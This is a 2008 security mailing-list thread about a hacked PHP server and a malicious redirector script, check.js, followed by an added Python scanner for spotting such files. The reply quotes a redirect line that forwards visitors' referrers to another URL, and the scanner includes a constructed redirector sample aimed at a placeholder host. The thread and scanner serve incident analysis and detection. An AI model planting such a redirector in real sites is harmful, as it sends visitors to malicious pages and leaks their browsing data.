WebApp Sec
mailing list archives
Re: PHP Security
From: "Greg Song" <bigrootno1 () gmail com>
Date: Wed, 19 Mar 2008 08:50:28 +0900
Hi,
There are some files, including 'check.js', same as you.
First of all, 'check.js' is a kind of redirector.
For example, if someone visits a website that includes 'check.js',
the request is redirected to some other URLs (usually getting malicious code),
and I guess it gathers information (where the visit came from).
Parts of check.js:
...
google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|ramble...
location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2
...
Greg.
2008/3/18, Sindre Øvrebø <sindre () webhuset no>:
----- Original message -----
From: "Greg Song" <bigrootno1 () gmail com>
To: webappsec () securityfocus com
Date: Tue, 18 Mar 2008 08:58:49 +0900
Subject: PHP Security
Hi all,
These days I'm analyzing a Solaris system that is using the Apache web
server and PHP. Of course it was hacked.
I could not find the reason for a situation where the specified directory
is created over and over (it includes check.js).
Weblog record as below:
xxx.xxx.xxx.xxx GET "/XXX/ahibix/check.js
Some pages can upload files, but it didn't work when I uploaded some PHP
file.
I'm wondering how it makes some directories.
Any suggestions, ideas?
Thanks all
Hi,
I am replying outside the list.
I just discovered check.js, and some other files, on one of my servers
yesterday.
What does check.js do? I am not familiar with this/these scripts.
Would be really cool if you replied :)
Sindre Øvrebø
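
The excerpt in Greg's reply shows two traits that can be used to sweep a web root for similar files: a list of search-engine names, and a location.href assignment that forwards document.referrer. The Python below is an added example, not part of the original thread; the sample scripts, the redirector.example URL and all function names are constructed for illustration, and it assumes the list is matched against the referrer.

```python
import os
import re

# Engine names as listed in the fragment quoted in the post.
ENGINES = {"google", "msn", "yahoo", "live", "ask", "dogpile", "mywebsearch", "yandex"}
ALTERNATION = re.compile(r"(?:[a-z0-9]+\|){3,}[a-z0-9]+", re.I)
# Assignment to location / location.href (not a == comparison); group 1 is the value.
NAV_ASSIGN = re.compile(r"\blocation(?:\.href)?\s*=(?!=)\s*([^;\n]+)", re.I)

# Constructed samples; the redirector URL is a placeholder, not from the incident.
SAMPLE_REDIRECTOR = """var JSS2 = "1", JSS3 = "https://redirector.example/in";
if (/google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex/i.test(document.referrer)) {
  location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2;
}"""
SAMPLE_ANALYTICS = "var fromSearch = /google|msn|yahoo|live/i.test(document.referrer);"
SAMPLE_BENIGN = 'if (location.href == "/old") { location.href = "/new"; }'


def scan_script(text):
    """Return the list of redirector traits found in one script's source."""
    findings = []
    for m in ALTERNATION.finditer(text):
        hits = set(m.group(0).lower().split("|")) & ENGINES
        if len(hits) >= 3:
            findings.append("search-engine list: " + ",".join(sorted(hits)))
            break
    for m in NAV_ASSIGN.finditer(text):
        if "document.referrer" in m.group(1):
            findings.append("redirect carrying document.referrer")
            break
    return findings


def is_suspicious(text):
    """Require both traits together to keep false positives down."""
    return len(scan_script(text)) == 2


def scan_tree(root):
    """Return paths of .js files under root that show both traits."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if is_suspicious(fh.read()):
                        flagged.append(path)
    return sorted(flagged)
```

A hit is a lead for manual review, not a verdict; a script that has been obfuscated or that redirects through location.replace() will not match these two patterns.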